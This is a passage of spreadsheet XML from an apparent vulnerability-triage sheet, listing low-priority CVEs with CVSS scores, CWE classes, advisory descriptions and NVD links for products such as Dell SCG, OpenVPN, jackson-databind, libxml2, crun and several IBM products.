      <c r="K4566" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="L4566" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains a Time-of-check Time-of-use (TOCTOU) Race Condition vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to denial of service.</t>
        </is>
      </c>
      <c r="M4566" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79730</t>
        </is>
      </c>
    </row>
    <row r="4567">
      <c r="A4567" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4567" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79967</t>
        </is>
      </c>
      <c r="C4567" s="5" t="n">
        <v>5.6</v>
      </c>
      <c r="D4567" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4567" s="5" t="inlineStr"/>
      <c r="F4567" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4567" s="5" t="inlineStr"/>
      <c r="H4567" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I4567" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4567" s="5" t="inlineStr"/>
      <c r="K4567" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L4567"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M4567" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79967</t>
        </is>
      </c>
    </row>
    <row r="4568">
      <c r="A4568" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4568" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79970</t>
        </is>
      </c>
      <c r="C4568" s="5" t="n">
        <v>5.6</v>
      </c>
      <c r="D4568" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4568" s="5" t="inlineStr"/>
      <c r="F4568" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4568" s="5" t="inlineStr"/>
      <c r="H4568" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I4568" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4568" s="5" t="inlineStr"/>
      <c r="K4568" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L4568" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Verification of Cryptographic Signature vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to protection mechanism bypass.</t>
        </is>
      </c>
      <c r="M4568" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79970</t>
        </is>
      </c>
    </row>
    <row r="4569">
      <c r="A4569" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4569" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81830</t>
        </is>
      </c>
      <c r="C4569" s="5" t="n">
        <v>5.6</v>
      </c>
      <c r="D4569" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4569" s="5" t="inlineStr"/>
      <c r="F4569" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4569" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4569" s="5" t="inlineStr"/>
      <c r="I4569" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4569" s="5" t="inlineStr"/>
      <c r="K4569" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="L4569" s="5" t="inlineStr">
        <is>
          <t>The Windows interactive service in OpenVPN 2.4.0 through 2.6.22 allows local authenticated users to bypass the trusted configuration directory constraint via incorrect file path validation</t>
        </is>
      </c>
      <c r="M4569" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81830</t>
        </is>
      </c>
    </row>
    <row r="4570">
      <c r="A4570" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4570" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83557</t>
        </is>
      </c>
      <c r="C4570" s="5" t="n">
        <v>5.6</v>
      </c>
      <c r="D4570" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4570" s="5" t="inlineStr"/>
      <c r="F4570" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G4570" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4570" s="5" t="inlineStr"/>
      <c r="I4570" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J4570" s="5" t="inlineStr"/>
      <c r="K4570" s="5" t="inlineStr">
        <is>
          <t>CWE-502, CWE-915</t>
        </is>
      </c>
      <c r="L4570" s="5" t="inlineStr">
        <is>
          <t>DefaultBaseTypeLimitingValidator is the PolymorphicTypeValidator applied automatically whenever @JsonTypeInfo is used without an explicitly configured custom validator. It denies polymorphic resolution only for a fixed set of "unsafe base types", and its isSafeSubType method returns true unconditionally for every base type outside that set. java.lang.Comparable was absent from the list despite being implemented by a very large fraction of JDK and application classes, comparable in breadth to java.io.Serializable, which is on the list for that reason. An application declaring an @JsonTypeInfo-annotated property or class with Comparable as its base type, and no custom PolymorphicTypeValidator, will accept a type identifier for essentially any class implementing Comparable. This yields an attacker-controlled object instantiation primitive; a demonstrated case constructs a java.io.File for an arbitrary attacker-chosen path, which becomes path-traversal-adjacent if the application subsequently calls path-sensitive methods on the value. No class implementing Comparable has been identified that yields code execution through deserialization alone. Global Default Typing via activateDefaultTyping is not affected, because that method structurally requires an explicit PolymorphicTypeValidator argument. This affects com.fasterxml.jackson.core:jackson-databind from 2.11.0 before 2.18.10, from 2.19.0 before 2.21.6, and from 2.22.0 before 2.22.2, and tools.jackson.core:jackson-databind from 3.0.0 before 3.1.6 and from 3.2.0 before 3.2.2. Users should upgrade to 2.18.10, 2.21.6, 2.22.2, 3.1.6, or 3.2.2.</t>
        </is>
      </c>
      <c r="M4570" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83557</t>
        </is>
      </c>
    </row>
    <row r="4571">
      <c r="A4571" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4571" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84380</t>
        </is>
      </c>
      <c r="C4571" s="5" t="n">
        <v>5.6</v>
      </c>
      <c r="D4571" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4571" s="5" t="inlineStr"/>
      <c r="F4571" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4571" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H4571" s="5" t="inlineStr"/>
      <c r="I4571" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J4571" s="5" t="inlineStr"/>
      <c r="K4571" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="L4571" s="5" t="inlineStr">
        <is>
          <t>HTTPX2 is a next generation HTTP client for Python. Prior to 2.11.0, Request._prepare() in src/httpx2/httpx2/_models.py can add a body-derived Content-Length header to a request that already contains a caller-supplied Transfer-Encoding header because its setdefault() processing checks each default header independently rather than treating the two framing headers as mutually exclusive. Fixed-size byte, JSON, form, and known-length multipart bodies can therefore be serialized over HTTP/1.1 with both headers, allowing request smuggling or connection desynchronization when downstream intermediaries disagree about which framing header takes precedence. This issue is fixed in version 2.11.0.</t>
        </is>
      </c>
      <c r="M4571" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84380</t>
        </is>
      </c>
    </row>
    <row r="4572">
      <c r="A4572" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4572" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86144</t>
        </is>
      </c>
      <c r="C4572" s="5" t="n">
        <v>5.6</v>
      </c>
      <c r="D4572" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4572" s="5" t="inlineStr"/>
      <c r="F4572" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4572" s="5" t="inlineStr"/>
      <c r="H4572" s="5" t="inlineStr"/>
      <c r="I4572" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J4572" s="5" t="inlineStr"/>
      <c r="K4572" s="5" t="inlineStr">
        <is>
          <t>CWE-669</t>
        </is>
      </c>
      <c r="L4572" s="5" t="inlineStr">
        <is>
          <t>In xinclude in libxml2 before 2.15.4, xmlXIncludeProcess and xmlXIncludeProcessTree do not propagate parseFlags. This has security relevance for, for example, the XML_PARSE_NONET flag, if (without it) a custom resource loader accesses the internet and triggers XML external entity injection, SSRF, or a denial of service (e.g., for an attacker-controlled internet resource that is intentionally slow).</t>
        </is>
      </c>
      <c r="M4572" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86144</t>
        </is>
      </c>
    </row>
    <row r="4573">
      <c r="A4573" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4573" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88264</t>
        </is>
      </c>
      <c r="C4573" s="5" t="n">
        <v>5.6</v>
      </c>
      <c r="D4573" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4573" s="5" t="inlineStr"/>
      <c r="F4573" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4573" s="5" t="inlineStr"/>
      <c r="H4573" s="5" t="inlineStr"/>
      <c r="I4573" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J4573" s="5" t="inlineStr"/>
      <c r="K4573" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L4573" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in crun. When the container configuration does not give /dev a dedicated mount, terminal setup can redirect /dev/console onto an attacker-controlled path, including via the read-only-rootfs bind-mount fallback. Affected versions are crun 1.29.1 and earlier. Default configurations that mount a fresh /dev are not exposed. No fixed release is available yet.</t>
        </is>
      </c>
      <c r="M4573" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88264</t>
        </is>
      </c>
    </row>
    <row r="4574">
      <c r="A4574" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4574" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88265</t>
        </is>
      </c>
      <c r="C4574" s="5" t="n">
        <v>5.6</v>
      </c>
      <c r="D4574" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4574" s="5" t="inlineStr"/>
      <c r="F4574" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4574" s="5" t="inlineStr"/>
      <c r="H4574" s="5" t="inlineStr"/>
      <c r="I4574" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J4574" s="5" t="inlineStr"/>
      <c r="K4574" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L4574" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in crun. After pivot_root, reopening /dev/null for stdio can follow a symlink and attach a host file to container stdio, then change that file's ownership. Affected versions are crun 1.29.1 and earlier. Default configurations that mount a fresh /dev are not exposed. No fixed release is available yet.</t>
        </is>
      </c>
      <c r="M4574" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88265</t>
        </is>
      </c>
    </row>
    <row r="4575">
      <c r="A4575" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4575" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-48651</t>
        </is>
      </c>
      <c r="C4575" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4575" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4575" s="5" t="inlineStr"/>
      <c r="F4575" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4575" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4575" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="I4575" s="5" t="inlineStr">
        <is>
          <t>2026-04-06</t>
        </is>
      </c>
      <c r="J4575" s="5" t="inlineStr"/>
      <c r="K4575" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L4575" s="5" t="inlineStr">
        <is>
          <t>In importWrappedKey of KMKeymasterApplet.java, there is a possible way access keys that should be restricted due to improper input validation. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M4575" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-48651</t>
        </is>
      </c>
    </row>
    <row r="4576">
      <c r="A4576" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4576" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-51619</t>
        </is>
      </c>
      <c r="C4576" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4576" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4576" s="5" t="inlineStr"/>
      <c r="F4576" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4576" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4576" s="5" t="inlineStr"/>
      <c r="I4576" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4576" s="5" t="inlineStr"/>
      <c r="K4576" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L4576" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the Thesycon DPC Latency Checker driver (dpc.sys) thru 1.4.0 allows local unprivileged users to cause a denial-of-service (BSOD) condition on Windows systems. The driver exposes an IOCTL interface (0x81772008) that accepts user-controlled input without validating pointers before passing them to kernel APIs. Specifically, it dereferences a user-supplied pointer and uses the resulting value in a call to ExSetTimerResolution, leading to an arbitrary kernel memory access. Exploiting this flaw results in a system crash.</t>
        </is>
      </c>
      <c r="M4576" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-51619</t>
        </is>
      </c>
    </row>
    <row r="4577">
      <c r="A4577" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4577" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0636</t>
        </is>
      </c>
      <c r="C4577" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4577" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4577" s="5" t="inlineStr"/>
      <c r="F4577" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G4577" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4577" s="5" t="inlineStr"/>
      <c r="I4577" s="5" t="inlineStr">
        <is>
          <t>2026-04-15</t>
        </is>
      </c>
      <c r="J4577" s="5" t="inlineStr"/>
      <c r="K4577" s="5" t="inlineStr">
        <is>
          <t>CWE-90</t>
        </is>
      </c>
      <c r="L4577" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an LDAP query ('LDAP injection') vulnerability in Legion of the Bouncy Castle Inc. BC-JAVA bcprov on all (prov modules).
 This vulnerability is associated with program files LDAPStoreHelper.
This issue affects BC-JAVA: from 1.74 before 1.80.2, from 1.81 before 1.81.1, from 1.82 before 1.84.</t>
        </is>
      </c>
      <c r="M4577" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0636</t>
        </is>
      </c>
    </row>
    <row r="4578">
      <c r="A4578" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4578" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16689</t>
        </is>
      </c>
      <c r="C4578" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4578" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4578" s="5" t="inlineStr"/>
      <c r="F4578" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4578" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H4578" s="5" t="inlineStr">
        <is>
          <t>ibm:app_connect_enterprise, ibm:integration_bus_for_z\/os</t>
        </is>
      </c>
      <c r="I4578" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4578" s="5" t="inlineStr"/>
      <c r="K4578" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="L4578" s="5" t="inlineStr">
        <is>
          <t>IBM App Connect Enterprise 13.0.1.0 through 13.0.8.1, and 12.0.1.0 through 12.0.12.28 and IBM Integration Bus for z/OS 10.1.0.0 through 10.1.0.7 could allow a local attacker to obtain sensitive information due to improper logging of credentials.</t>
        </is>
      </c>
      <c r="M4578" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16689</t>
        </is>
      </c>
    </row>
    <row r="4579">
      <c r="A4579" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4579" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16730</t>
        </is>
      </c>
      <c r="C4579" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4579" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4579" s="5" t="inlineStr"/>
      <c r="F4579" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4579" s="5" t="inlineStr"/>
      <c r="H4579" s="5" t="inlineStr"/>
      <c r="I4579" s="5" t="inlineStr">
        <is>
          <t>2026-07-24</t>
        </is>
      </c>
      <c r="J4579" s="5" t="inlineStr"/>
      <c r="K4579" s="5" t="inlineStr">
        <is>
          <t>CWE-755</t>
        </is>
      </c>
      <c r="L4579" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in dbus-broker. When the process file-descriptor limit is reached, EMFILE/ENFILE errors during peer setup (notably SO_PEERPIDFD) are handled as fatal failures, causing the broker to exit. A local attacker who can open many connections to the user session bus can trigger this and deny service to the desktop session. Flatpak applications can reach the host session bus through the dbus proxy.</t>
        </is>
      </c>
      <c r="M4579" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16730</t>
        </is>
      </c>
    </row>
    <row r="4580">
      <c r="A4580" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4580" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17270</t>
        </is>
      </c>
      <c r="C4580" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4580" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4580" s="5" t="inlineStr"/>
      <c r="F4580" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4580" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H4580" s="5" t="inlineStr">
        <is>
          <t>ibm:i</t>
        </is>
      </c>
      <c r="I4580" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4580" s="5" t="inlineStr"/>
      <c r="K4580" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L4580" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a local attacker to cause a denial of service due to a stack-based buffer overflow.</t>
        </is>
      </c>
      <c r="M4580" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17270</t>
        </is>
      </c>
    </row>
    <row r="4581">
      <c r="A4581" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4581" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17440</t>
        </is>
      </c>
      <c r="C4581" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4581" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4581" s="5" t="inlineStr"/>
      <c r="F4581" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4581" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H4581" s="5" t="inlineStr">
        <is>
          <t>ibm:app_connect_enterprise, ibm:integration_bus_for_z\/os</t>
        </is>
      </c>
      <c r="I4581" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4581" s="5" t="inlineStr"/>
      <c r="K4581" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="L4581" s="5" t="inlineStr">
        <is>
          <t>IBM App Connect Enterprise 13.0.1.0 through 13.0.8.1, and 12.0.1.0 through 12.0.12.28 and IBM Integration Bus for z/OS 10.1.0.0 through 10.1.0.7 could allow a local attacker to cause a denial of service due to uncontrolled recursion.</t>
        </is>
      </c>
      <c r="M4581" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17440</t>
        </is>
      </c>
    </row>
    <row r="4582">
      <c r="A4582" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4582" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17442</t>
        </is>
      </c>
      <c r="C4582" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4582" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4582" s="5" t="inlineStr"/>
      <c r="F4582" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4582" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H4582" s="5" t="inlineStr">
        <is>
          <t>ibm:app_connect_enterprise, ibm:integration_bus_for_z\/os</t>
        </is>
      </c>
      <c r="I4582" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4582" s="5" t="inlineStr"/>
      <c r="K4582" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="L4582" s="5" t="inlineStr">
        <is>
          <t>IBM App Connect Enterprise 13.0.1.0 through 13.0.8.1, and 12.0.1.0 through 12.0.12.28 and IBM Integration Bus for z/OS 10.1.0.0 through 10.1.0.7 could allow a local attacker to obtain sensitive information due to credentials being written to trace logs in cleartext.</t>
        </is>
      </c>
      <c r="M4582" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17442</t>
        </is>
      </c>
    </row>
    <row r="4583">
      <c r="A4583" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4583" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17469</t>
        </is>
      </c>
      <c r="C4583" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4583" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4583" s="5" t="inlineStr"/>
      <c r="F4583" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4583" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H4583" s="5" t="inlineStr">
        <is>
          <t>ibm:i</t>
        </is>
      </c>
      <c r="I4583" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4583" s="5" t="inlineStr"/>
      <c r="K4583" s="5" t="inlineStr">
        <is>
          <t>CWE-193, CWE-787</t>
        </is>
      </c>
      <c r="L4583" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a local authenticated attacker to cause a denial of service due to an off-by-one write in the LPD queue name parser.</t>
        </is>
      </c>
      <c r="M4583" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17469</t>
        </is>
      </c>
    </row>
    <row r="4584">
      <c r="A4584" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4584" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18622</t>
        </is>
      </c>
      <c r="C4584" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4584" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4584" s="5" t="inlineStr"/>
      <c r="F4584" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4584" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H4584" s="5" t="inlineStr">
        <is>
          <t>apple:macos, foxit:pdf_editor, foxit:pdf_reader, microsoft:windows</t>
        </is>
      </c>
      <c r="I4584" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J4584" s="5" t="inlineStr"/>
      <c r="K4584" s="5" t="inlineStr">
        <is>
          <t>CWE-451</t>
        </is>
      </c>
      <c r="L4584" s="5" t="inlineStr">
        <is>
          <t>Foxit PDF Editor/Reader inconsistently alerts users when signature fields are abnormally modified, including alterations to appearance, coordinates, or field duplication. This may mislead users into trusting tampered documents, since the UI cannot accurately reflect the actual integrity status of signatures.</t>
        </is>
      </c>
      <c r="M4584" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18622</t>
        </is>
      </c>
    </row>
    <row r="4585">
      <c r="A4585" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4585" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18858</t>
        </is>
      </c>
      <c r="C4585" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4585" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4585" s="5" t="inlineStr"/>
      <c r="F4585" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4585" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H4585" s="5" t="inlineStr">
        <is>
          <t>ibm:i</t>
        </is>
      </c>
      <c r="I4585" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4585" s="5" t="inlineStr"/>
      <c r="K4585" s="5" t="inlineStr">
        <is>
          <t>CWE-267</t>
        </is>
      </c>
      <c r="L4585" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, and 7.5 could allow a local authenticated attacker to obtain information from a privileged file when using SSH.</t>
        </is>
      </c>
      <c r="M4585" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18858</t>
        </is>
      </c>
    </row>
    <row r="4586">
      <c r="A4586" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4586" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19649</t>
        </is>
      </c>
      <c r="C4586" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4586" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4586" s="5" t="inlineStr"/>
      <c r="F4586" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4586" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H4586" s="5" t="inlineStr">
        <is>
          <t>ibm:app_connect_enterprise, ibm:integration_bus_for_z\/os</t>
        </is>
      </c>
      <c r="I4586" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4586" s="5" t="inlineStr"/>
      <c r="K4586" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="L4586" s="5" t="inlineStr">
        <is>
          <t>IBM App Connect Enterprise 13.0.1.0 through 13.0.8.1, and 12.0.1.0 through 12.0.12.28 and IBM Integration Bus for z/OS 10.1.0.0 through 10.1.0.7 could allow a local attacker to obtain sensitive information due to improper logging of database credentials.</t>
        </is>
      </c>
      <c r="M4586" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19649</t>
        </is>
      </c>
    </row>
    <row r="4587">
      <c r="A4587" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4587" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20500</t>
        </is>
      </c>
      <c r="C4587" s="5" t="n">
